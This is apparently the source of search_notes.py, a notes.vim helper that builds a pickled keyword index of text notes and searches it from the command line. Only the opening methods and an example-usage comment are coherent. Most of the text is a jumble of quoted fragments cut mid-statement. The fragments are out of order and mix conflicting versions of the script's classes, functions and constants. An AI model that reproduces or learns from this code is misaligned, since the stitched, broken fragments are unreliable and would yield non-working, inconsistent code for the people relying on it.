        decorated.sort()
        selection = [d[-1] for d in decorated[:limit]]
        print(self.encode(u'\n'.join(selection)))

    def tokenize(self, text):
        """Tokenize a string into a set of normalized, unique keywords."""
        words = set()
        text = self.decode(text)
        for word in re.findall(r'\w+', text, re.UNICODE):
            word = word.strip()
            if word != '' and not word.isspace() and len(word) >= 2:
                words.add(word)
        return words

    def normalize(self, keyword):
        """Normalize the case of a keyword if configured to do so."""
        return keyword if self.case_sensitive else keyword.lower()

    def encode(self, text):
        """Encode a string in the user's preferred character encoding."""
        if isinstance(text, str):
            text = codecs.encode(text, self.character_encoding, 'ignore')
        return text

    def decode(self, text):
        """Decode a string in the user's preferred character encoding."""
        if isinstance(text, bytes):
            text = codecs.decode(text, self.character_encoding, 'ignore')
        return text

    def munge_path(self, path):
        """Canonicalize a user-defined path, making it absolute."""
        return os.path.abspath(os.path.expanduser(path))

    def usage(self):
        print(__doc__.strip())
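# Example invocations of the command line interface defined by NotesIndex
# (added for illustration; the keywords and paths are hypothetical, the
# options come from the usage text at the top of this file):
#
#   python search_notes.py --ignore-case python pickle
#   python search_notes.py --list=pick
#   python search_notes.py --notes=~/Dropbox/notes todo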
If # I really", "matches: print('\\n'.join(sorted(matches))) logger.debug(\"Finished searching index in %s\", global_timer) def parse_args(self, argv): \"\"\"Parse the", "--database=FILE set path to keywords index file -n, --notes=DIR set directory with user", "= os.path.getmtime(abspath) logger.info(\"Found %i notes in %s ..\", len(notes_on_disk) - last_count, directory) last_count", "time.time() def __str__(self): return \"%.2f seconds\" % self.elapsed_time @property def elapsed_time(self): return time.time()", "Add new notes to index. for filename, last_modified in notes_on_disk.items(): self.add_note_to_index(index, filename, last_modified)", "seen note has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = index['files'][filename] if last_modified_on_disk >", "logger = logging.getLogger(__name__) def load_index(index_location): try: load_timer = Timer() logger.debug(\"Loading index from %s", "__init__(self): self.start_time = time.time() def __str__(self): return \"%.2f seconds\" % self.elapsed_time @property def", "self.index['keywords'][kw].append(filename) self.dirty = True def delete_note(self, filename): \"\"\"Remove a note from the index.\"\"\"", "!= filename] def tokenize(self, text: str) -> Set[str]: \"\"\"Tokenize a string into a", "self.normalize(k)) for k in self.index['keywords']] for usr_kw in keywords: submatches = set() for", "self.case_sensitive = True self.keyword_filter = None # Map command line options to variables.", "import logging import os import re import sys import time import pickle from", "a string in the user's preferred character encoding.\"\"\" if isinstance(text, str): text =", "munge_path(self, path): \"\"\"Canonicalize user-defined path, making it absolute.\"\"\" return os.path.abspath(os.path.expanduser(path)) def usage(self): print(__doc__.strip())", "the command line option defaults. self.database_file = '~/.vim/misc/notes/index.pickle' self.user_directories = ['~/.vim/misc/notes/user/'] self.character_encoding =", "logger.debug(\"Format version of index loaded from disk: %i\", index['version']) assert index['version'] == INDEX_VERSION,", "Also the pickle protocol makes sure repeating strings are stored only # once,", "try: import Levenshtein except ImportError: Levenshtein = None # The version of the", "# using Vim's internal :vimgrep command to search all of the user's notes:", "= [filename] else: index['keywords'][kw].append(filename) def delete_note_from_index(self, index, filename): \"\"\"Delete a note from given", "notes on disk. notes_on_disk = {} last_count = 0 for directory in user_directories:", "can forget about it. del notes_on_disk[filename] # Add new notes to index. for", "index format detected!\" logger.debug(\"Loaded %i notes from index in %s\", len(index['files']), load_timer) except", "the Vim plug-in see http://peterodding.com/code/vim/notes/. \"\"\" Usage: search_notes.py [OPTIONS] KEYWORD... Search one or", "by this revision of the # `search_notes.py' script; if an existing index file", "return words def normalize(self, keyword): \"\"\"Normalize the case of a keyword if configured", "set(index['files'].keys()): if filename not in notes_on_disk: # Forget a deleted note. self.delete_note_from_index(index, filename)", "`search_notes.py' script; if an existing index file is found with an # unsupported", "# Already checked this note, we can forget about it. 
del notes_on_disk[filename] #", "self.first_use = False self.dirty = False logger.debug(\"Loaded %i notes from index in %s\",", "more # efficient, but really it doesn't seem to be needed -- I", "# Add new notes to index. for filename, last_modified in notes_on_disk.items(): self.add_note(filename, last_modified)", "not self.first_use: for filename in self.index['files'].keys(): if filename not in notes_on_disk: # Forget", "it doesn't seem to be needed -- I have over # 850 notes", "normalized_db_kw: submatches.update(index['keywords'][original_db_kw]) if matches is None: matches = submatches else: matches &= submatches", "= None normalized_db_keywords = [(k, self.normalize(k)) for k in self.index['keywords']] for usr_kw in", "index. INDEX_VERSION = 3 # Filename matching patterns of files to ignore during", "\"Unhandled option\" logger.debug(\"Index file: %s\", self.database_file) logger.debug(\"Notes directories: %r\", self.user_directories) logger.debug(\"Character encoding: %s\",", "index: %s\", filename) del self.index['files'][filename] for kw in self.index['keywords']: self.index['keywords'][kw] = [x for", "self.index = pickle.load(handle) logger.debug(\"Format version of index loaded from disk: %i\", self.index['version']) assert", "the notes search.\"\"\" global_timer = Timer() keywords = self.parse_args(argv or sys.argv[1:]) self.load_index() self.update_index()", "automatically during each invocation of the program. Valid options include: -i, --ignore-case ignore", "library modules. import codecs import fnmatch import getopt import logging import os import", "modules. import codecs import fnmatch import getopt import logging import os import re", "directory) for root, dirs, files in os.walk(directory): for filename in files: if any(fnmatch.fnmatch(filename,", "TextIndex: def __init__(self, index_location: str, notes_directories: List[str]): self.index_location = index_location self.notes_directories = notes_directories", "supported by this revision of the # `search_notes.py' script; if an existing index", "using a nested for loop over all keywords in the index. If #", "Timer() with open(self.database_file, 'wb') as handle: pickle.dump(self.index, handle) logger.debug(\"Saved index to disk in", "# # - Very large notes don't slow searching down so much; #", "script; if an existing index file is found with an # unsupported version,", "logger.info(\"Found %i notes in %s ..\", len(notes_on_disk) - last_count, directory) last_count = len(notes_on_disk)", "\"\"\"Save the keyword index to disk.\"\"\" save_timer = Timer() with open(self.database_file, 'wb') as", "__str__(self): return \"%.2f seconds\" % self.elapsed_time @property def elapsed_time(self): return time.time() - self.start_time", "of keyword(s) -l, --list=SUBSTR list keywords matching substring -d, --database=FILE set path to", "TODO: Only save if necessary. self.save_index(INDEX_FILE_PATH, index) def add_note_to_index(self, index, filename, last_modified): \"\"\"Add", "as handle: pickle.dump(index, handle) class NotesIndex: def __init__(self, argv=None): \"\"\"Entry point to the", "previously seen note has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = self.index['files'][filename] if last_modified_on_disk", "[self.munge_path(d) for d in self.user_directories if os.path.isdir(d)] # Return tokenized keyword arguments. return", "have to I'll probably come up with something more # efficient, but really", "each invocation of the program. 
Valid options include: -i, --ignore-case ignore case of", "= time.time() def __str__(self): return \"%.2f seconds\" % self.elapsed_time @property def elapsed_time(self): return", "Levenshtein except ImportError: Levenshtein = None # The version of the index format", "logger.info(\"Found a total of %i notes ..\", len(notes_on_disk)) # Check for updated and/or", "!= '' and not word.isspace() and len(word) >= 2: words.add(word) return words def", "disk in %s\", save_timer) def update_index(self): \"\"\"Update the keyword index by scanning the", "notes from index in %s\", len(self.index['files']), load_timer) except Exception: logger.warn(\"Failed to load index", "efficient, but really it doesn't seem to be needed -- I have over", "on disk. notes_on_disk = {} last_count = 0 for directory in self.user_directories: print('Scanning',", "self.add_note(filename, last_modified) logger.info(\"Updated index in %s\", update_timer) def add_note(self, filename, last_modified): \"\"\"Add a", "unique keywords.\"\"\" return {w.strip() for w in re.findall(r'\\w{3,}', text, re.UNICODE) if not w.isspace()}", "last modified times of the notes on disk. notes_on_disk = {} last_count =", "persisted using the pickle # module. The structure of the dictionary may seem", "to do so.\"\"\" return keyword if self.case_sensitive else keyword.lower() def encode(self, text): \"\"\"Encode", "for fast text file searching using keyword index on disk. # # Author:", "arguments.\"\"\" try: opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh', [ 'ignore-case', 'list=', 'database=', 'notes=', 'encoding=',", "from index: %s\", filename) del index['files'][filename] for kw in index['keywords']: index['keywords'][kw] = [x", "to keywords index file -n, --notes=DIR set directory with user notes (can be", "open(self.database_file, 'wb') as handle: pickle.dump(self.index, handle) logger.debug(\"Saved index to disk in %s\", save_timer)", "word.strip() if word != '' and not word.isspace() and len(word) >= 2: words.add(word)", "index to disk.\"\"\" with open(database_file, 'wb') as handle: pickle.dump(index, handle) class NotesIndex: def", "= set() for original_db_kw, normalized_db_kw in normalized_db_keywords: if word in normalized_db_kw: submatches.update(index['keywords'][original_db_kw]) if", "[self.normalize(k) for k in self.tokenize(' '.join(keywords))] def load_index(self): \"\"\"Load the keyword index or", "by scanning the notes directory.\"\"\" user_directories = self.notes_directories index = self.index # First", "down so much; # - Hundreds of notes can be searched in less", "index format that's supported by this revision of the # `search_notes.py' script; if", "to keep track of long during operations.\"\"\" def __init__(self): self.start_time = time.time() def", "'version': INDEX_VERSION} def save_index(self): \"\"\"Save the keyword index to disk.\"\"\" save_timer = Timer()", "\"\"\"Entry point to the notes search.\"\"\" global_timer = Timer() keywords = self.parse_args(argv or", "# # For more information about the Vim plug-in see http://peterodding.com/code/vim/notes/. \"\"\" Usage:", "sys.argv[1:]) self.load_index() self.update_index() if self.dirty: self.save_index() if self.keyword_filter is not None: self.list_keywords(self.keyword_filter) logger.debug(\"Finished", "directory.\"\"\" update_timer = Timer() # First we find the filenames and last modified", "I'm using a nested for loop over all keywords in the index. If", "a full text index, updated automatically during each invocation of the program. 
Valid", "text files using a full text index, updated automatically during each invocation of", "logger.debug(\"Index file: %s\", self.database_file) logger.debug(\"Notes directories: %r\", self.user_directories) logger.debug(\"Character encoding: %s\", self.character_encoding) if", "class NotesIndex: def __init__(self, argv=None): \"\"\"Entry point to the notes search.\"\"\" global_timer =", "a string in the user's preferred character encoding.\"\"\" if isinstance(text, bytes): text =", "matches = submatches else: matches &= submatches return list(matches) if matches else []", "given keywords.\"\"\" print('Searching index') index = load_index(INDEX_FILE_PATH) needles = query.split() matches = None", "# `search_notes.py' script; if an existing index file is found with an #", "%s ..\", len(notes_on_disk) - last_count, directory) last_count = len(notes_on_disk) logger.info(\"Found a total of", "usr_kw in normalized_db_kw: submatches.update(self.index['keywords'][original_db_kw]) if matches is None: matches = submatches else: matches", "string in the user's preferred character encoding.\"\"\" if isinstance(text, bytes): text = codecs.decode(text,", "INDEX_VERSION, \"Incompatible index format detected!\" logger.debug(\"Loaded %i notes from index in %s\", len(index['files']),", "it's quite # fast. Also the pickle protocol makes sure repeating strings are", "elif opt in ('-d', '--database'): self.database_file = arg elif opt in ('-n', '--notes'):", "elif opt in ('-e', '--encoding'): self.character_encoding = arg elif opt in ('-v', '--verbose'):", "on disk. # # Author: <NAME> <<EMAIL>> # Last Change: November 1, 2015", "of the program. Valid options include: -i, --ignore-case ignore case of keyword(s) -l,", "def __init__(self, index_location: str, notes_directories: List[str]): self.index_location = index_location self.notes_directories = notes_directories self.index", "for directory in self.user_directories: print('Scanning', directory) for root, dirs, files in os.walk(directory): for", "index): \"\"\"Save the keyword index to disk.\"\"\" with open(database_file, 'wb') as handle: pickle.dump(index,", "\"\"\"Load the keyword index or start with an empty one.\"\"\" try: load_timer =", "substring, limit=25): \"\"\"Print all (matching) keywords to standard output.\"\"\" print('listing keywords') decorated =", "{'*.md', '*.txt'} NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')] INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle') logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger(__name__) def", "see http://peterodding.com/code/vim/notes/. \"\"\" Usage: search_notes.py [OPTIONS] KEYWORD... 
Search one or more directories of", "with open(self.database_file, 'wb') as handle: pickle.dump(self.index, handle) logger.debug(\"Saved index to disk in %s\",", "handle: pickle.dump(self.index, handle) logger.debug(\"Saved index to disk in %s\", save_timer) def update_index(self): \"\"\"Update", "pickle protocol makes sure repeating strings are stored only # once, so it's", "loaded from disk: %i\", index['version']) assert index['version'] == INDEX_VERSION, \"Incompatible index format detected!\"", "k in self.index['keywords']] for usr_kw in keywords: submatches = set() for original_db_kw, normalized_db_kw", "self.first_use: for filename in self.index['files'].keys(): if filename not in notes_on_disk: # Forget a", "unique keywords.\"\"\" words = set() text = self.decode(text) for word in re.findall(r'\\w+', text,", "load index from file!\", exc_info=True) return {'keywords': {}, 'files': {}, 'version': INDEX_VERSION} else:", "= {'*.md', '*.txt'} NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')] INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle') logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger(__name__)", "--notes=DIR set directory with user notes (can be repeated) -e, --encoding=NAME set character", "abspath = os.path.join(root, filename) notes_on_disk[abspath] = os.path.getmtime(abspath) logger.info(\"Found %i notes in %s ..\",", "seen note has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = self.index['files'][filename] if last_modified_on_disk >", "in INCLUDE_PATTERNS): abspath = os.path.join(root, filename) notes_on_disk[abspath] = os.path.getmtime(abspath) logger.info(\"Found %i notes in", "as handle: raw = handle.read() for kw in tokenize(raw): if kw not in", "index['version']) assert index['version'] == INDEX_VERSION, \"Incompatible index format detected!\" logger.debug(\"Loaded %i notes from", "of the given keywords.\"\"\" print('Searching index') index = load_index(INDEX_FILE_PATH) needles = query.split() matches", "in %s\", global_timer) def parse_args(self, argv): \"\"\"Parse the command line arguments.\"\"\" try: opts,", "save_index(self): \"\"\"Save the keyword index to disk.\"\"\" save_timer = Timer() with open(self.database_file, 'wb')", "decorated.append((-len(filenames), kw)) decorated.sort() selection = [d[-1] for d in decorated[:limit]] print(selection) print(self.encode(u'\\n'.join(selection))) def", "as it may appear at first sight :-). # # For more information", "= submatches else: matches &= submatches return sorted(matches) if matches else [] def", "unsupported version, the script knows that it should rebuild the index. INDEX_VERSION =", "an empty one.\"\"\" try: load_timer = Timer() logger.debug(\"Loading index from %s ..\", self.database_file)", "new notes to index. for filename, last_modified in notes_on_disk.items(): self.add_note_to_index(index, filename, last_modified) #", "load_index(INDEX_FILE_PATH) needles = query.split() matches = None normalized_db_keywords = [(k, k.lower()) for k", "self.add_note_to_index(index, filename, last_modified) # TODO: Only save if necessary. self.save_index(INDEX_FILE_PATH, index) def add_note_to_index(self,", "%s\", self.character_encoding) if self.keyword_filter is not None: self.keyword_filter = self.decode(self.keyword_filter) # Canonicalize pathnames,", "database_file: str, index): \"\"\"Save the keyword index to disk.\"\"\" with open(database_file, 'wb') as", "the last run? 
if not self.first_use: for filename in self.index['files'].keys(): if filename not", "file!\", exc_info=True) self.first_use = True self.dirty = True self.index = {'keywords': {}, 'files':", "format detected!\" logger.debug(\"Loaded %i notes from index in %s\", len(index['files']), load_timer) except Exception:", "'version': INDEX_VERSION} else: return index class TextIndex: def __init__(self, index_location: str, notes_directories: List[str]):", "[(k, k.lower()) for k in index['keywords']] for word in needles: submatches = set()", "submatches return sorted(matches) if matches else [] def update_index(self): \"\"\"Update the keyword index", "return sorted(matches) if matches else [] def update_index(self): \"\"\"Update the keyword index by", "self.user_directories.append(arg) elif opt in ('-e', '--encoding'): self.character_encoding = arg elif opt in ('-v',", "this message and exit For more information see http://peterodding.com/code/vim/notes/ \"\"\" # Standard library", "for x in index['keywords'][kw] if x != filename] def tokenize(self, text: str) ->", "{}, 'version': INDEX_VERSION} def save_index(self): \"\"\"Save the keyword index to disk.\"\"\" save_timer =", "encoding.\"\"\" if isinstance(text, str): text = codecs.encode(text, self.character_encoding, 'ignore') return text def decode(self,", "notes_on_disk = {} last_count = 0 for directory in user_directories: for root, dirs,", "self.elapsed_time @property def elapsed_time(self): return time.time() - self.start_time if __name__ == '__main__': NotesIndex()", "deleted note. self.delete_note(filename) else: # Check whether previously seen note has changed? last_modified_on_disk", "exit For more information see http://peterodding.com/code/vim/notes/ \"\"\" # Standard library modules. import codecs", "load_index(self): \"\"\"Load the keyword index or start with an empty one.\"\"\" try: load_timer", "len(notes_on_disk) - last_count, directory) last_count = len(notes_on_disk) logger.info(\"Found a total of %i notes", "plug-in see http://peterodding.com/code/vim/notes/. \"\"\" Usage: search_notes.py [OPTIONS] KEYWORD... Search one or more directories", "INCLUDE_PATTERNS): abspath = os.path.join(root, filename) notes_on_disk[abspath] = os.path.getmtime(abspath) logger.info(\"Found %i notes in %s", "not w.isspace()} def save_index(self, database_file: str, index): \"\"\"Save the keyword index to disk.\"\"\"", "option defaults. self.database_file = '~/.vim/misc/notes/index.pickle' self.user_directories = ['~/.vim/misc/notes/user/'] self.character_encoding = 'UTF-8' self.case_sensitive =", "850 notes (about 8 MB) and 25000 keywords and it's plenty fast. if", "kw, filenames in self.index['keywords'].items(): normalized_kw = self.normalize(kw) if substring in normalized_kw: if Levenshtein", "submatches else: matches &= submatches return list(matches) if matches else [] def list_keywords(self,", "filename in self.index['files'].keys(): if filename not in notes_on_disk: # Forget a deleted note.", "pickle from typing import List, Set try: import Levenshtein except ImportError: Levenshtein =", "file to index: %s\", filename) self.index['files'][filename] = last_modified with open(filename, encoding='utf-8') as handle:", "print('Scanning', directory) for root, dirs, files in os.walk(directory): for filename in files: if", "= {} last_count = 0 for directory in user_directories: for root, dirs, files", "it's not as bad as it may appear at first sight :-). 
#", "http://peterodding.com/code/vim/notes/ # License: MIT # # This Python script can be used by", "= False self.dirty = False logger.debug(\"Loaded %i notes from index in %s\", len(self.index['files']),", "file from index: %s\", filename) del index['files'][filename] for kw in index['keywords']: index['keywords'][kw] =", "of the index format that's supported by this revision of the # `search_notes.py'", "the keyword index by scanning the notes directory.\"\"\" user_directories = self.notes_directories index =", "we find the filenames and last modified times of the notes on disk.", "using Vim's internal :vimgrep command to search all of the user's notes: #", "= Timer() logger.debug(\"Loading index from %s ..\", index_location) with open(index_location, 'rb') as handle:", "since the last run? if not self.first_use: for filename in self.index['files'].keys(): if filename", "has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note_from_index(index,", "set path to keywords index file -n, --notes=DIR set directory with user notes", "about it. del notes_on_disk[filename] # Add new notes to index. for filename, last_modified", "notes_on_disk[filename] last_modified_in_db = self.index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note(filename) self.add_note(filename, last_modified_on_disk) # Already", "2015 # URL: http://peterodding.com/code/vim/notes/ # License: MIT # # This Python script can", "the program. Valid options include: -i, --ignore-case ignore case of keyword(s) -l, --list=SUBSTR", "encoding of notes -v, --verbose make more noise -h, --help show this message", "\"\"\"Canonicalize user-defined path, making it absolute.\"\"\" return os.path.abspath(os.path.expanduser(path)) def usage(self): print(__doc__.strip()) class Timer:", "%s\", len(index['files']), load_timer) except Exception: logger.warning(\"Failed to load index from file!\", exc_info=True) return", "logger.debug(\"Loading index from %s ..\", index_location) with open(index_location, 'rb') as handle: index =", "file to index: %s\", filename) index['files'][filename] = last_modified with open(filename, encoding='utf-8') as handle:", "filename] self.dirty = True def search_index(self, keywords): \"\"\"Return names of files containing all", "= self.notes_directories index = self.index # First we find the filenames and last", "URL: http://peterodding.com/code/vim/notes/ # License: MIT # # This Python script can be used", "% self.elapsed_time @property def elapsed_time(self): return time.time() - self.start_time if __name__ == '__main__':", "index, filename, last_modified): \"\"\"Add a note to the index (assumes the note is", "is None: matches = submatches else: matches &= submatches return list(matches) if matches", "def add_note(self, filename, last_modified): \"\"\"Add a note to the index (assumes the note", "self.notes_directories index = self.index # First we find the filenames and last modified", "# For more information about the Vim plug-in see http://peterodding.com/code/vim/notes/. \"\"\" Usage: search_notes.py", "disk. 
notes_on_disk = {} last_count = 0 for directory in user_directories: for root,", "= ['~/.vim/misc/notes/user/'] self.character_encoding = 'UTF-8' self.case_sensitive = True self.keyword_filter = None # Map", "not None: decorated.append((Levenshtein.distance(normalized_kw, substring), -len(filenames), kw)) else: decorated.append((-len(filenames), kw)) decorated.sort() selection = [d[-1]", "# Filename matching patterns of files to ignore during scans. INCLUDE_PATTERNS = {'*.md',", "= set() text = self.decode(text) for word in re.findall(r'\\w+', text, re.UNICODE): word =", "in less than a second. # # The keyword index is a Python", "absolute.\"\"\" return os.path.abspath(os.path.expanduser(path)) def usage(self): print(__doc__.strip()) class Timer: \"\"\"Easy to use timer to", "a total of %i notes ..\", len(notes_on_disk)) # Check for updated and/or deleted", "self.keyword_filter = self.decode(self.keyword_filter) # Canonicalize pathnames, check validity. self.database_file = self.munge_path(self.database_file) self.user_directories =", "we can forget about it. del notes_on_disk[filename] # Add new notes to index.", "index in %s\", len(index['files']), load_timer) except Exception: logger.warning(\"Failed to load index from file!\",", "else keyword.lower() def encode(self, text): \"\"\"Encode a string in the user's preferred character", "# Python script for fast text file searching using keyword index on disk.", "deleted notes since the last run? if index: for filename in set(index['files'].keys()): if", "os import re import sys import time import pickle from typing import List,", "= True self.index = {'keywords': {}, 'files': {}, 'version': INDEX_VERSION} def save_index(self): \"\"\"Save", "save if necessary. self.save_index(INDEX_FILE_PATH, index) def add_note_to_index(self, index, filename, last_modified): \"\"\"Add a note", "# Return tokenized keyword arguments. return [self.normalize(k) for k in self.tokenize(' '.join(keywords))] def", "to disk.\"\"\" save_timer = Timer() with open(self.database_file, 'wb') as handle: pickle.dump(self.index, handle) logger.debug(\"Saved", "load_timer = Timer() logger.debug(\"Loading index from %s ..\", self.database_file) with open(self.database_file, 'rb') as", "from disk: %i\", self.index['version']) assert self.index['version'] == INDEX_VERSION, \"Incompatible index format detected!\" self.first_use", "is None: matches = submatches else: matches &= submatches return sorted(matches) if matches", "decode(self, text): \"\"\"Decode a string in the user's preferred character encoding.\"\"\" if isinstance(text,", "invocation of the program. Valid options include: -i, --ignore-case ignore case of keyword(s)", "elif opt in ('-n', '--notes'): self.user_directories.append(arg) elif opt in ('-e', '--encoding'): self.character_encoding =", "global_timer) else: matches = self.search_index(keywords) if matches: print('\\n'.join(sorted(matches))) logger.debug(\"Finished searching index in %s\",", "def save_index(self, database_file: str, index): \"\"\"Save the keyword index to disk.\"\"\" with open(database_file,", "# This Python script can be used by the notes.vim plug-in to perform", "very naive but it's quite # fast. 
Also the pickle protocol makes sure", "= {'keywords': {}, 'files': {}, 'version': INDEX_VERSION} def save_index(self): \"\"\"Save the keyword index", "in normalized_db_keywords: # Yes I'm using a nested for loop over all keywords", "don't slow searching down so much; # - Hundreds of notes can be", "index by scanning the notes directory.\"\"\" user_directories = self.notes_directories index = self.index #", "parse_args(self, argv): \"\"\"Parse the command line arguments.\"\"\" try: opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh',", "operations.\"\"\" def __init__(self): self.start_time = time.time() def __str__(self): return \"%.2f seconds\" % self.elapsed_time", "Map command line options to variables. for opt, arg in opts: if opt", "in %s\", len(index['files']), load_timer) except Exception: logger.warning(\"Failed to load index from file!\", exc_info=True)", "set() text = self.decode(text) for word in re.findall(r'\\w+', text, re.UNICODE): word = word.strip()", "from %s ..\", self.database_file) with open(self.database_file, 'rb') as handle: self.index = pickle.load(handle) logger.debug(\"Format", "None: self.list_keywords(self.keyword_filter) logger.debug(\"Finished listing keywords in %s\", global_timer) else: matches = self.search_index(keywords) if", "save_timer = Timer() with open(self.database_file, 'wb') as handle: pickle.dump(self.index, handle) logger.debug(\"Saved index to", "needles = query.split() matches = None normalized_db_keywords = [(k, k.lower()) for k in", "if word != '' and not word.isspace() and len(word) >= 2: words.add(word) return", "user's notes: # # - Very large notes don't slow searching down so", "Timer() logger.debug(\"Loading index from %s ..\", index_location) with open(index_location, 'rb') as handle: index", "from file!\", exc_info=True) self.first_use = True self.dirty = True self.index = {'keywords': {},", "self.user_directories = [self.munge_path(d) for d in self.user_directories if os.path.isdir(d)] # Return tokenized keyword", "# efficient, but really it doesn't seem to be needed -- I have", "note to the index (assumes the note is not already indexed).\"\"\" logger.info(\"Adding file", "in ('-h', '--help'): self.usage() sys.exit(0) else: assert False, \"Unhandled option\" logger.debug(\"Index file: %s\",", "'ignore-case', 'list=', 'database=', 'notes=', 'encoding=', 'verbose', 'help', ]) except getopt.GetoptError as error: print(str(error))", "None: matches = submatches else: matches &= submatches return list(matches) if matches else", "to the notes search.\"\"\" global_timer = Timer() keywords = self.parse_args(argv or sys.argv[1:]) self.load_index()", "line option defaults. self.database_file = '~/.vim/misc/notes/index.pickle' self.user_directories = ['~/.vim/misc/notes/user/'] self.character_encoding = 'UTF-8' self.case_sensitive", "def save_index(self): \"\"\"Save the keyword index to disk.\"\"\" save_timer = Timer() with open(self.database_file,", "k in self.tokenize(' '.join(keywords))] def load_index(self): \"\"\"Load the keyword index or start with", "self.delete_note_from_index(index, filename) else: # Check whether previously seen note has changed? last_modified_on_disk =", "self.database_file) logger.debug(\"Notes directories: %r\", self.user_directories) logger.debug(\"Character encoding: %s\", self.character_encoding) if self.keyword_filter is not", "in notes_on_disk: # Forget a deleted note. 
self.delete_note(filename) else: # Check whether previously", "else: matches &= submatches return list(matches) if matches else [] def list_keywords(self, substring,", "in the user's preferred character encoding.\"\"\" if isinstance(text, str): text = codecs.encode(text, self.character_encoding,", "tokenize(self, text: str) -> Set[str]: \"\"\"Tokenize a string into a list of normalized,", "a string into a list of normalized, unique keywords.\"\"\" return {w.strip() for w", "= [os.path.expanduser('~/Dropbox/notes')] INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle') logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger(__name__) def load_index(index_location): try: load_timer", "user's preferred character encoding.\"\"\" if isinstance(text, bytes): text = codecs.decode(text, self.character_encoding, 'ignore') return", "from given index.\"\"\" logger.info(\"Deleting file from index: %s\", filename) del index['files'][filename] for kw", "loop over all keywords in the index. If # I really have to", "import getopt import logging import os import re import sys import time import", "else: self.index['keywords'][kw].append(filename) self.dirty = True def delete_note(self, filename): \"\"\"Remove a note from the", "dirs, files in os.walk(directory): for filename in files: if any(fnmatch.fnmatch(filename, pattern) for pattern", "None # The version of the index format that's supported by this revision", "of the dictionary may seem very naive but it's quite # fast. Also", "%s\", self.database_file) logger.debug(\"Notes directories: %r\", self.user_directories) logger.debug(\"Character encoding: %s\", self.character_encoding) if self.keyword_filter is", "\"\"\"Return names of files containing all of the given keywords.\"\"\" print('Searching index') index", "index to disk in %s\", save_timer) def update_index(self): \"\"\"Update the keyword index by", "'files': {}, 'version': INDEX_VERSION} def save_index(self): \"\"\"Save the keyword index to disk.\"\"\" save_timer", "line arguments.\"\"\" try: opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh', [ 'ignore-case', 'list=', 'database=', 'notes=',", "Check whether previously seen note has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = self.index['files'][filename]", "= [(k, self.normalize(k)) for k in self.index['keywords']] for usr_kw in keywords: submatches =", "global_timer = Timer() keywords = self.parse_args(argv or sys.argv[1:]) self.load_index() self.update_index() if self.dirty: self.save_index()", "len(notes_on_disk)) # Check for updated and/or deleted notes since the last run? if", "of the notes on disk. notes_on_disk = {} last_count = 0 for directory", "updated and/or deleted notes since the last run? if not self.first_use: for filename", "as handle: pickle.dump(self.index, handle) logger.debug(\"Saved index to disk in %s\", save_timer) def update_index(self):", "script can be used by the notes.vim plug-in to perform fast # keyword", "index loaded from disk: %i\", self.index['version']) assert self.index['version'] == INDEX_VERSION, \"Incompatible index format", "note. self.delete_note(filename) else: # Check whether previously seen note has changed? last_modified_on_disk =", "to variables. 
for opt, arg in opts: if opt in ('-i', '--ignore-case'): self.case_sensitive", "self.index['version']) assert self.index['version'] == INDEX_VERSION, \"Incompatible index format detected!\" self.first_use = False self.dirty", "def __str__(self): return \"%.2f seconds\" % self.elapsed_time @property def elapsed_time(self): return time.time() -", "def delete_note(self, filename): \"\"\"Remove a note from the index.\"\"\" logger.info(\"Removing file from index:", "all of the given keywords.\"\"\" matches = None normalized_db_keywords = [(k, self.normalize(k)) for", "that's supported by this revision of the # `search_notes.py' script; if an existing", "files in os.walk(directory): for filename in files: if any(fnmatch.fnmatch(filename, pattern) for pattern in", "run? if not self.first_use: for filename in self.index['files'].keys(): if filename not in notes_on_disk:", "user-defined path, making it absolute.\"\"\" return os.path.abspath(os.path.expanduser(path)) def usage(self): print(__doc__.strip()) class Timer: \"\"\"Easy", "\"\"\" # Standard library modules. import codecs import fnmatch import getopt import logging", "self.dirty = True def delete_note(self, filename): \"\"\"Remove a note from the index.\"\"\" logger.info(\"Removing", "search.\"\"\" global_timer = Timer() keywords = self.parse_args(argv or sys.argv[1:]) self.load_index() self.update_index() if self.dirty:", "keywords = self.parse_args(argv or sys.argv[1:]) self.load_index() self.update_index() if self.dirty: self.save_index() if self.keyword_filter is", "raw = handle.read() for kw in tokenize(raw): if kw not in index['keywords']: index['keywords'][kw]", "\"\"\"Parse the command line arguments.\"\"\" try: opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh', [ 'ignore-case',", "[d[-1] for d in decorated[:limit]] print(selection) print(self.encode(u'\\n'.join(selection))) def tokenize(self, text): \"\"\"Tokenize a string", "-v, --verbose make more noise -h, --help show this message and exit For", "filename) self.add_note_to_index(index, filename, last_modified_on_disk) # Already checked this note, we can forget about", "normalized, unique keywords.\"\"\" words = set() text = self.decode(text) for word in re.findall(r'\\w+',", "= self.index # First we find the filenames and last modified times of", "a nested for loop over all keywords in the index. If # I", "= None # Map command line options to variables. for opt, arg in", "file -n, --notes=DIR set directory with user notes (can be repeated) -e, --encoding=NAME", "as handle: self.index = pickle.load(handle) logger.debug(\"Format version of index loaded from disk: %i\",", "<NAME> <<EMAIL>> # Last Change: November 1, 2015 # URL: http://peterodding.com/code/vim/notes/ # License:", "index from file!\", exc_info=True) self.first_use = True self.dirty = True self.index = {'keywords':", "# module. The structure of the dictionary may seem very naive but it's", "filename, last_modified in notes_on_disk.items(): self.add_note(filename, last_modified) logger.info(\"Updated index in %s\", update_timer) def add_note(self,", "of normalized, unique keywords.\"\"\" return {w.strip() for w in re.findall(r'\\w{3,}', text, re.UNICODE) if", "def decode(self, text): \"\"\"Decode a string in the user's preferred character encoding.\"\"\" if", "note. self.delete_note_from_index(index, filename) 